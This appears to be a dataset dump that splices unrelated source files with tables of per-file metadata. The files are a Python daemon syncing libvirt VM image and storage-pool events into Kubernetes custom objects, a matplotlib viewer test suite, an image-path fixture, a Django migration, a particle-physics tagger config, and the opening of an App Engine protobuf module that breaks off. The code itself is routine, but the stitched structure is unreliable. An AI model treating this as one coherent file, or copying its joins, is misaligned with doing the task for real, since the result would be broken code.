        # Relay one event to the back-end handler, logging API failures.
        try:
            myVmdImageLibvirtXmlEventHandler(action, image_name, self.pool, xml_path,
                                             self.group, self.version, self.plural)
        except ApiException:
            logger.error('Oops! ', exc_info=1)

    def on_moved(self, event):
        if event.is_directory:
            logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
            return
        logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
        # NOTE(review): the image name is taken from the *source* path even
        # though the destination path is forwarded — confirm intentional.
        self._forward('Create', os.path.split(event.src_path)[1], event.dest_path)

    def on_created(self, event):
        if event.is_directory:
            logger.debug("directory created:{0}".format(event.src_path))
            return
        logger.debug("file created:{0}".format(event.src_path))
        self._forward('Create', os.path.split(event.src_path)[1], event.src_path)

    def on_deleted(self, event):
        if event.is_directory:
            logger.debug("directory deleted:{0}".format(event.src_path))
            return
        logger.debug("file deleted:{0}".format(event.src_path))
        self._forward('Delete', os.path.split(event.src_path)[1], event.src_path)

    def on_modified(self, event):
        # Modify events for image files are logged but not reported.
        if event.is_directory:
            # logger.debug("directory modified:{0}".format(event.src_path))
            return
        logger.debug("file modified:{0}".format(event.src_path))
def myImageLibvirtXmlEventHandler(event, name, xml_path, group, version, plural):
    """Report a VM image XML file event to the custom-object API.

    event    -- one of 'Create', 'Modify', 'Delete'
    name     -- image / custom object name
    xml_path -- path of the libvirt XML file backing the image
    group, version, plural -- custom-resource coordinates

    Errors never propagate: failures are logged and, where possible,
    reported onto the object via report_failure().
    """
    # print(jsondict)
    if event == "Create":
        try:
            logger.debug('Create vm image %s, report to virtlet' % name)
            # Skeleton custom object, labelled with this host.
            jsondict = {'spec': {'domain': {}, 'nodeName': HOSTNAME, 'status': {}},
                        'kind': VMI_KIND, 'metadata': {'labels': {'host': HOSTNAME}, 'name': name},
                        'apiVersion': '%s/%s' % (group, version)}
            with open(xml_path, 'r') as fr:
                vm_xml = fr.read()
            # libvirt XML -> kube-style JSON, merged into the skeleton spec.
            vm_json = toKubeJson(xmlToJson(vm_xml))
            vm_json = updateDomain(loads(vm_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
            jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            body = addNodeName(jsondict)
            try:
                create_custom_object(group, version, plural, body)
            except ApiException as e:
                logger.error(e)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                jsondict = get_custom_object(group, version, plural, name)
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.error('Oops! ', exc_info=1)
    elif event == "Modify":
        jsondict = get_custom_object(group, version, plural, name)
        try:
            logger.debug('Modify vm image %s, report to virtlet' % name)
            with open(xml_path, 'r') as fr:
                vm_xml = fr.read()
            vm_json = toKubeJson(xmlToJson(vm_xml))
            vm_json = updateDomain(loads(vm_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            # logger.debug(body)
            update_custom_object(group, version, plural, name, body)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
    elif event == "Delete":
        # jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=group,
        #                                                                   version=version,
        #                                                                   namespace='default',
        #                                                                   plural=plural,
        #                                                                   name=name)
        # Step 1: clear the domain structure on the object before deleting it.
        try:
            jsondict = get_custom_object(group, version, plural, name)
            # with open(xml_path, 'r') as fr:
            #     vm_xml = fr.read()
            # vm_json = toKubeJson(xmlToJson(vm_xml))
            # vm_json = updateDomain(loads(vm_json))
            jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, {})
            body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
            update_custom_object(group, version, plural, name, body)
        except ApiException as e:
            if e.reason == 'Not Found':
                # Object already gone -- nothing to clean up.
                logger.debug('**VM image %s already deleted, ignore this 404 error.' % name)
            else:
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
        # Step 2: delete the custom object itself.
        try:
            logger.debug('Delete vm image %s, report to virtlet' % name)
            delete_custom_object(group, version, plural, name)
            # jsondict = updateDomainStructureAndDeleteLifecycleInJson(jsondict, vm_json)
            # body = addExceptionMessage(jsondict, 'VirtletError', 'VM has been deleted in back-end.')
            # modifyStructure(name, body, group, version, plural)
        except ApiException as e:
            if e.reason == 'Not Found':
                logger.debug('**VM image %s already deleted, ignore this 404 error.' % name)
            else:
                info = sys.exc_info()
                try:
                    report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
                except:
                    logger.warning('Oops! ', exc_info=1)
        except:
            logger.error('Oops! ', exc_info=1)
            info = sys.exc_info()
            try:
                report_failure(name, jsondict, 'VirtletError', str(info[1]), group, version, plural)
            except:
                logger.warning('Oops! ', exc_info=1)
class ImageLibvirtXmlEventHandler(FileSystemEventHandler):
    """Watchdog handler for a VM image template directory.

    Only files with a '.xml' extension are reported; the custom object
    name is the file name without its extension.
    """

    def __init__(self, field, target, group, version, plural):
        FileSystemEventHandler.__init__(self)
        self.field = field
        self.target = target
        self.group = group
        self.version = version
        self.plural = plural

    def _handle_xml(self, action, path):
        # Dispatch one event to the reporter when the path is an .xml file;
        # API errors are logged instead of breaking watchdog's loop.
        vmi, file_type = os.path.splitext(os.path.split(path)[1])
        if file_type == '.xml':
            try:
                myImageLibvirtXmlEventHandler(action, vmi, path, self.group, self.version, self.plural)
            except ApiException:
                logger.error('Oops! ', exc_info=1)

    def on_moved(self, event):
        if event.is_directory:
            logger.debug("directory moved from {0} to {1}".format(event.src_path, event.dest_path))
        else:
            logger.debug("file moved from {0} to {1}".format(event.src_path, event.dest_path))
            # A move is treated as a Create at the destination.
            self._handle_xml('Create', event.dest_path)

    def on_created(self, event):
        # Creation is logged only; the Create report happens on move
        # (files are written elsewhere and moved into place).
        if event.is_directory:
            logger.debug("directory created:{0}".format(event.src_path))
        else:
            logger.debug("file created:{0}".format(event.src_path))

    def on_deleted(self, event):
        if event.is_directory:
            logger.debug("directory deleted:{0}".format(event.src_path))
        else:
            logger.debug("file deleted:{0}".format(event.src_path))
            self._handle_xml('Delete', event.src_path)

    def on_modified(self, event):
        if event.is_directory:
            pass
        else:
            self._handle_xml('Modify', event.src_path)
def updateDomainStructureAndDeleteLifecycleInJson(jsondict, body):
    """Merge *body* into jsondict['spec'] in place, first removing any
    truthy 'lifecycle' entry from the spec. Returns the same dict.
    """
    if jsondict:
        spec = jsondict['spec']
        if spec:
            # Drop the lifecycle section (only if present and truthy),
            # then overlay the new domain structure.
            if spec.get('lifecycle'):
                del spec['lifecycle']
            spec.update(body)
    return jsondict
def addNodeName(jsondict):
    """Stamp this host's name into spec.nodeName; returns the same dict.

    No-op when jsondict or its 'spec' value is falsy.
    """
    if jsondict:
        spec = jsondict['spec']
        if spec:
            # `spec` is the same object as jsondict['spec'].
            spec['nodeName'] = HOSTNAME
    return jsondict
def main():
    """Entry point: watch libvirt XML dirs and vmd storage pools,
    mirroring filesystem events into kubernetes custom objects.

    Blocks until KeyboardInterrupt. Storage pools are re-scanned every
    second so newly created 'vmd' pools are watched dynamically.
    """
    observer = Observer()
    try:
        # Watch the libvirt domain XML directories for VM events.
        for ob in LIBVIRT_XML_DIR:
            if not os.path.exists(ob[1]):
                # FIX: was os.makedirs(ob[1], 0x0711) -- a hex literal
                # (decimal 1809); the intended POSIX mode is octal 711.
                os.makedirs(ob[1], 0o711)
            event_handler = VmLibvirtXmlEventHandler(ob[0], ob[1], GROUP, VERSION, PLURAL_VM)
            observer.schedule(event_handler, ob[1], True)
        # Watch vmd template dirs, creating a (transient) libvirt dir pool
        # for each; pool creation failure rolls the directory back.
        for ob in VMD_TEMPLATE_DIR:
            if not os.path.exists(ob[1]):
                os.makedirs(ob[1], 0o711)  # FIX: octal mode, was hex 0x0711
            try:
                runCmdRaiseException('virsh pool-create-as --name %s --type dir --target %s' % (ob[0], ob[1]))
            except:
                os.removedirs(ob[1])
                logger.error('Oops! ', exc_info=1)
            event_handler = VmdImageLibvirtXmlEventHandler(ob[0], ob[1], GROUP, VERSION,
                                                           PLURAL_VM_DISK_IMAGE)
            observer.schedule(event_handler, ob[1], True)
        observer.start()
        OLD_PATH_WATCHERS = {}
        while True:
            try:
                paths = _get_all_pool_path()
                # Keep only pools whose content marker file says 'vmd'.
                # FIX: iterate over a snapshot -- deleting from `paths`
                # while iterating paths.items() raises RuntimeError on
                # Python 3.
                for pool_name, pool_path in list(paths.items()):
                    content_file = '%s/content' % pool_path
                    if os.path.exists(content_file):
                        with open(content_file, 'r') as fr:
                            pool_content = fr.read().strip()
                        if pool_content != 'vmd':
                            del paths[pool_name]
                # Unschedule watchers whose pool path no longer exists.
                watchers = {}
                for path in list(OLD_PATH_WATCHERS.keys()):
                    if path not in paths.values():
                        observer.unschedule(OLD_PATH_WATCHERS[path])
                    else:
                        watchers[path] = OLD_PATH_WATCHERS[path]
                OLD_PATH_WATCHERS = watchers
                # Schedule a volume watcher for every new pool path.
                for pool in paths.keys():
                    if paths[pool] not in OLD_PATH_WATCHERS.keys() and os.path.isdir(paths[pool]):
                        logger.debug(paths[pool])
                        event_handler = VmVolEventHandler(pool, paths[pool], GROUP, VERSION,
                                                          PLURAL_VM_DISK)
                        watcher = observer.schedule(event_handler, paths[pool], True)
                        OLD_PATH_WATCHERS[paths[pool]] = watcher
            except Exception:
                logger.debug(traceback.print_exc())
                logger.debug("error occur when watch all storage pool")
                time.sleep(3)
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    except:
        logger.warning('Oops! ', exc_info=1)
    observer.join()
if __name__ == "__main__":
    # Load kube credentials once, then keep main() alive forever: on any
    # crash, log it, back off 5 seconds, and restart.
    config.load_kube_config(config_file=TOKEN)
    while True:
        try:
            main()
        except Exception as e:
            # Connection-level failures suggest the apiserver endpoint or
            # token went stale; reload the kubeconfig before retrying.
            if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1:
                config.load_kube_config(config_file=TOKEN)
            info = sys.exc_info()
            logger.error('Oops! ', exc_info=1)
            time.sleep(5)
            continue
| 47.332834
| 206
| 0.524548
| 6,309
| 63,142
| 5.096529
| 0.048344
| 0.030696
| 0.062698
| 0.036201
| 0.859862
| 0.849257
| 0.843814
| 0.831281
| 0.823506
| 0.813927
| 0
| 0.008628
| 0.363039
| 63,142
| 1,333
| 207
| 47.368342
| 0.790845
| 0.390643
| 0
| 0.792105
| 0
| 0
| 0.101332
| 0
| 0
| 0
| 0.000318
| 0
| 0
| 1
| 0.048684
| false
| 0.006579
| 0.023684
| 0.002632
| 0.088158
| 0.001316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d63f328fa46da85ad0f8b414087213c70dda102
| 10,600
|
py
|
Python
|
tests/image/test_viewer.py
|
keio-ytlab/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 1
|
2018-10-25T12:57:38.000Z
|
2018-10-25T12:57:38.000Z
|
tests/image/test_viewer.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | 28
|
2018-08-25T03:54:30.000Z
|
2018-10-14T12:09:47.000Z
|
tests/image/test_viewer.py
|
yuishihara/researchutils
|
bb3ec467386d43a1e2282ec6d024216ce4dae841
|
[
"MIT"
] | null | null | null |
import matplotlib
import matplotlib.pyplot
import numpy as np
from researchutils.image import viewer
import pytest
from mock import patch
class TestViewer(object):
    """Unit tests for researchutils.image.viewer.

    Every test patches the matplotlib entry points so nothing is actually
    rendered; assertions check only how pyplot was driven.
    """

    def test_create_window(self):
        # imshow is called plainly for color images, with cmap='gray'
        # when is_gray is requested.
        with patch('matplotlib.pyplot.imshow') as mock_imshow:
            image = np.ndarray(shape=(28, 28, 3))
            viewer._create_window(image=image)
            mock_imshow.assert_called_with(image)
            viewer._create_window(image=image, is_gray=True)
            mock_imshow.assert_called_with(image, cmap='gray')

    def test_show_image(self):
        # A single image produces one imshow + title and exactly one show.
        with patch('matplotlib.pyplot.imshow') as mock_imshow:
            with patch('matplotlib.pyplot.title') as mock_title:
                with patch('matplotlib.pyplot.subplot') as mock_subplot:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        image = np.ndarray(shape=(28, 28, 3))
                        title = 'test'
                        viewer.show_image(image=image, title=title)
                        mock_imshow.assert_called_with(image)
                        mock_title.assert_called_with(title)
                        mock_show.assert_called_once()

    def test_show_images(self):
        # One imshow/title call per image, still a single show.
        with patch('matplotlib.pyplot.imshow') as mock_imshow:
            with patch('matplotlib.pyplot.title') as mock_title:
                with patch('matplotlib.pyplot.subplot') as mock_subplot:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        image1 = np.ndarray(shape=(28, 28, 3))
                        image2 = np.ndarray(shape=(28, 28, 3))
                        images = [image1, image2]
                        title = 'test'
                        viewer.show_images(images=images, title=title)
                        assert mock_imshow.call_count == len(images)
                        assert mock_title.call_count == len(images)
                        mock_show.assert_called_once()

    def test_show_images_with_comparisons(self):
        # Comparisons add their own imshow/title calls on top of images.
        with patch('matplotlib.pyplot.imshow') as mock_imshow:
            with patch('matplotlib.pyplot.title') as mock_title:
                with patch('matplotlib.pyplot.subplot') as mock_subplot:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        image1 = np.ndarray(shape=(28, 28, 3))
                        image2 = np.ndarray(shape=(28, 28, 3))
                        images = [image1, image2]
                        title = 'test'
                        image3 = np.ndarray(shape=(28, 28, 3))
                        image4 = np.ndarray(shape=(28, 28, 3))
                        comparisons = [image3, image4]
                        comparison_title = 'comparisons'
                        viewer.show_images(
                            images=images, title=title, comparisons=comparisons, comparison_title=comparison_title)
                        assert mock_imshow.call_count == len(images) + len(comparisons)
                        assert mock_title.call_count == len(images) + len(comparisons)
                        mock_show.assert_called_once()

    def test_animate(self):
        # Animation draws one artist (imshow) and shows once regardless of
        # the number of frames.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show', return_value=mock_axes) as mock_show:
                        num_frames = 10
                        images = [np.ndarray(shape=(10, 10, 3))
                                  for i in range(num_frames)]
                        viewer.animate(images, auto_close=True)
                        assert mock_imshow.call_count == 1
                        assert mock_show.call_count == 1

    def test_animate_with_comparison(self):
        # One comparison stream -> 2 subplots and 2 imshow artists.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        with patch('matplotlib.pyplot.subplot') as mock_subplot:
                            num_frames = 10
                            images = [np.ndarray(shape=(10, 10, 3))
                                      for i in range(num_frames)]
                            viewer.animate(
                                images=images, comparisons=images, auto_close=True)
                            assert mock_imshow.call_count == 2
                            assert mock_subplot.call_count == 2
                            assert mock_show.call_count == 1

    def test_animate_unsupoprted_dimension(self):
        # A nested list-of-lists of comparison streams is rejected.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        with patch('matplotlib.pyplot.subplot') as mock_subplot:
                            num_frames = 10
                            images = [np.ndarray(shape=(10, 10, 3))
                                      for i in range(num_frames)]
                            with pytest.raises(ValueError):
                                viewer.animate(
                                    images=images, comparisons=[[images, images], [images, images]], auto_close=True)

    def test_animate_with_many_comparisons(self):
        # Two comparison streams -> 3 subplots / 3 imshow artists.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        with patch('matplotlib.pyplot.subplot') as mock_subplot:
                            num_frames = 10
                            images = [np.ndarray(shape=(10, 10, 3))
                                      for i in range(num_frames)]
                            viewer.animate(
                                images=images, comparisons=[images, images], auto_close=True)
                            assert mock_imshow.call_count == 3
                            assert mock_subplot.call_count == 3
                            assert mock_show.call_count == 1

    def test_animate_save_gif(self):
        # save_gif=True routes through FuncAnimation.save exactly once.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.animation.FuncAnimation.save') as mock_save:
                        with patch('matplotlib.pyplot.show') as mock_show:
                            num_frames = 10
                            images = [np.ndarray(shape=(10, 10, 3))
                                      for i in range(num_frames)]
                            viewer.animate(
                                images, auto_close=True, save_gif=True)
                            assert mock_save.call_count == 1
                            assert mock_imshow.call_count == 1
                            assert mock_show.call_count == 1

    def test_animate_in_matrix_form_1x3(self):
        # Three videos in one row: one subplot/imshow per video.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        with patch('matplotlib.pyplot.subplot') as mock_subplot:
                            num_frames = 10
                            video_frames = [np.ndarray(shape=(10, 10, 3))
                                            for i in range(num_frames)]
                            videos = [video_frames, video_frames, video_frames]
                            viewer.animate_in_matrix_form(
                                videos, auto_close=True, images_per_row=3)
                            assert mock_imshow.call_count == 3
                            assert mock_subplot.call_count == 3
                            assert mock_show.call_count == 1

    def test_animate_in_matrix_form_3x1(self):
        # Same videos arranged as a single column.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        with patch('matplotlib.pyplot.subplot') as mock_subplot:
                            num_frames = 10
                            video_frames = [np.ndarray(shape=(10, 10, 3))
                                            for i in range(num_frames)]
                            videos = [video_frames, video_frames, video_frames]
                            viewer.animate_in_matrix_form(
                                videos, auto_close=True, images_per_row=1)
                            assert mock_imshow.call_count == 3
                            assert mock_subplot.call_count == 3
                            assert mock_show.call_count == 1

    def test_animate_in_matrix_form_images_per_row_none(self):
        # images_per_row=None still renders every video once.
        with patch('matplotlib.image.AxesImage') as mock_axes:
            with patch('matplotlib.pyplot.imshow', return_value=mock_axes) as mock_imshow:
                with patch('matplotlib.pyplot.figure') as mock_figure:
                    with patch('matplotlib.pyplot.show') as mock_show:
                        with patch('matplotlib.pyplot.subplot') as mock_subplot:
                            num_frames = 10
                            video_frames = [np.ndarray(shape=(10, 10, 3))
                                            for i in range(num_frames)]
                            videos = [video_frames, video_frames, video_frames]
                            viewer.animate_in_matrix_form(
                                videos, auto_close=True, images_per_row=None)
                            assert mock_imshow.call_count == 3
                            assert mock_subplot.call_count == 3
                            assert mock_show.call_count == 1
if __name__ == '__main__':
    # Allow running this test module directly, without the pytest CLI.
    pytest.main()
| 53.535354
| 117
| 0.529906
| 1,107
| 10,600
| 4.846432
| 0.076784
| 0.087232
| 0.184157
| 0.200373
| 0.891519
| 0.865424
| 0.831873
| 0.782665
| 0.762721
| 0.720969
| 0
| 0.020654
| 0.387925
| 10,600
| 197
| 118
| 53.807107
| 0.806258
| 0
| 0
| 0.7
| 0
| 0
| 0.122453
| 0.119151
| 0
| 0
| 0
| 0
| 0.182353
| 1
| 0.070588
| false
| 0
| 0.035294
| 0
| 0.111765
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d7627e33b9c720428a5db2449456ea643896afa
| 360
|
py
|
Python
|
tests/results.py
|
reed9999/tuneinrecordings
|
58c64bcb16f8e5a0fcdba283cc230ccf48941343
|
[
"MIT"
] | null | null | null |
tests/results.py
|
reed9999/tuneinrecordings
|
58c64bcb16f8e5a0fcdba283cc230ccf48941343
|
[
"MIT"
] | null | null | null |
tests/results.py
|
reed9999/tuneinrecordings
|
58c64bcb16f8e5a0fcdba283cc230ccf48941343
|
[
"MIT"
] | null | null | null |
# Format borrowed from the excellent Django tests.
# Fixture data: maps a result-set name to recording image paths of the
# form '<timestamp>/<md5-hash>.image'.
TEST_RESULTS = {
    'all_imgs': [
        '1521309364.52960/e56200f5bbfbca547aa0712a5c9947aa.image',
        '1521320898.1627/60a58df0b9d06ce905b72c371a665d93.image',
        '1521323051.57557/60a58df0b9d06ce905b72c371a665d93.image',
        # NOTE(review): exact duplicate of the previous entry --
        # presumably intentional (duplicate handling); confirm.
        '1521323051.57557/60a58df0b9d06ce905b72c371a665d93.image',
    ]
}
| 32.727273
| 66
| 0.744444
| 27
| 360
| 9.851852
| 0.740741
| 0.417293
| 0.353383
| 0.390977
| 0.530075
| 0.530075
| 0
| 0
| 0
| 0
| 0
| 0.465116
| 0.163889
| 360
| 10
| 67
| 36
| 0.418605
| 0.130556
| 0
| 0.25
| 0
| 0
| 0.727564
| 0.701923
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d87e6c68a6b9944359a6064a95b654db84aa822
| 1,546
|
py
|
Python
|
allies/migrations/0005_auto_20201215_1647.py
|
kevincornish/HeckGuide
|
eb974d6b589908f5fc2308d41032a48941cc3d21
|
[
"MIT"
] | 4
|
2022-02-16T10:19:11.000Z
|
2022-03-17T03:34:26.000Z
|
allies/migrations/0005_auto_20201215_1647.py
|
kevincornish/HeckGuide
|
eb974d6b589908f5fc2308d41032a48941cc3d21
|
[
"MIT"
] | 1
|
2022-02-17T14:02:31.000Z
|
2022-03-31T03:56:42.000Z
|
allies/migrations/0005_auto_20201215_1647.py
|
kevincornish/HeckGuide
|
eb974d6b589908f5fc2308d41032a48941cc3d21
|
[
"MIT"
] | 3
|
2022-02-17T06:13:52.000Z
|
2022-03-23T21:37:21.000Z
|
# Generated by Django 3.1 on 2020-12-15 21:47
from django.db import migrations, models
class Migration(migrations.Migration):
    """Widen the ally count fields to nullable BigIntegerField on both
    the current and historical ally models.
    """

    dependencies = [
        ('allies', '0004_auto_20201215_1505'),
    ]

    # Exactly the AlterField set the original spelled out long-hand:
    # every (model, field) pair gets a nullable BigIntegerField, in the
    # same order (model outer, field inner).
    operations = [
        migrations.AlterField(
            model_name=model,
            name=field,
            field=models.BigIntegerField(null=True),
        )
        for model in ('currentally', 'historicalally')
        for field in ('cost', 'group_id', 'previous_cost', 'troop_kills')
    ]
| 28.62963
| 52
| 0.560802
| 130
| 1,546
| 6.538462
| 0.307692
| 0.188235
| 0.235294
| 0.272941
| 0.825882
| 0.825882
| 0.778824
| 0.778824
| 0.715294
| 0.715294
| 0
| 0.028958
| 0.329884
| 1,546
| 53
| 53
| 29.169811
| 0.791506
| 0.027814
| 0
| 0.851064
| 1
| 0
| 0.133911
| 0.015323
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9a9554e336707615caa279b8a464f09579f039ac
| 4,332
|
py
|
Python
|
RecoBTag/MXNet/python/pfParticleNetDiscriminatorsJetTags_cfi.py
|
gputtley/cmssw
|
c1ef8454804e4ebea8b65f59c4a952a6c94fde3b
|
[
"Apache-2.0"
] | 6
|
2017-09-08T14:12:56.000Z
|
2022-03-09T23:57:01.000Z
|
RecoBTag/MXNet/python/pfParticleNetDiscriminatorsJetTags_cfi.py
|
gputtley/cmssw
|
c1ef8454804e4ebea8b65f59c4a952a6c94fde3b
|
[
"Apache-2.0"
] | 545
|
2017-09-19T17:10:19.000Z
|
2022-03-07T16:55:27.000Z
|
RecoBTag/MXNet/python/pfParticleNetDiscriminatorsJetTags_cfi.py
|
gputtley/cmssw
|
c1ef8454804e4ebea8b65f59c4a952a6c94fde3b
|
[
"Apache-2.0"
] | 14
|
2017-10-04T09:47:21.000Z
|
2019-10-23T18:04:45.000Z
|
import FWCore.ParameterSet.Config as cms
# Every discriminator's denominator repeats the same five QCD probability
# outputs; factor the construction instead of spelling out ~50 InputTags.
_QCD_PROBS = ['probQCDbb', 'probQCDcc', 'probQCDb', 'probQCDc', 'probQCDothers']


def _vinput_tags(probs):
    """Build a cms.VInputTag of pfParticleNetJetTags outputs for `probs`."""
    return cms.VInputTag(*[cms.InputTag('pfParticleNetJetTags', prob) for prob in probs])


def _signal_vs_qcd(name, signal_probs):
    """One <signal>vsQCD discriminator PSet: numerator = signal
    probabilities, denominator = signal + QCD probabilities."""
    return cms.PSet(
        name=cms.string(name),
        numerator=_vinput_tags(signal_probs),
        denominator=_vinput_tags(signal_probs + _QCD_PROBS),
    )


pfParticleNetDiscriminatorsJetTags = cms.EDProducer(
    'BTagProbabilityToDiscriminator',
    discriminators=cms.VPSet(
        _signal_vs_qcd('TvsQCD', ['probTbcq', 'probTbqq']),
        _signal_vs_qcd('WvsQCD', ['probWcq', 'probWqq']),
        _signal_vs_qcd('ZvsQCD', ['probZbb', 'probZcc', 'probZqq']),
        _signal_vs_qcd('ZbbvsQCD', ['probZbb']),
        _signal_vs_qcd('HbbvsQCD', ['probHbb']),
        _signal_vs_qcd('H4qvsQCD', ['probHqqqq']),
    )
)
| 43.32
| 66
| 0.586334
| 285
| 4,332
| 8.912281
| 0.136842
| 0.216535
| 0.610236
| 0.108661
| 0.930709
| 0.922835
| 0.811024
| 0.784252
| 0.784252
| 0.784252
| 0
| 0.00032
| 0.277701
| 4,332
| 99
| 67
| 43.757576
| 0.811441
| 0
| 0
| 0.877551
| 0
| 0
| 0.346722
| 0.006925
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010204
| 0
| 0.010204
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9acbe2d7d640af5b0eae065bc447d898beede8cc
| 44,960
|
py
|
Python
|
AppServer/google/appengine/api/modules/modules_service_pb.py
|
loftwah/appscale
|
586fc1347ebc743d7a632de698f4dbfb09ae38d6
|
[
"Apache-2.0"
] | 790
|
2015-01-03T02:13:39.000Z
|
2020-05-10T19:53:57.000Z
|
AppServer/google/appengine/api/modules/modules_service_pb.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1,361
|
2015-01-08T23:09:40.000Z
|
2020-04-14T00:03:04.000Z
|
AppServer/google/appengine/api/modules/modules_service_pb.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 155
|
2015-01-08T22:59:31.000Z
|
2020-04-08T08:01:53.000Z
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
# Silence pychecker for this generated module.
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""

# Newer ProtocolBuffer runtimes support proto2 extensions; fall back to
# the plain message base class when that support is absent.
if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'):
  _extension_runtime = True
  _ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage
else:
  _extension_runtime = False
  _ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage
class ModulesServiceError(ProtocolBuffer.ProtocolMessage):
  """Generated protobuf message apphosting.ModulesServiceError.

  The message carries no fields; it exists to hold the ErrorCode enum.
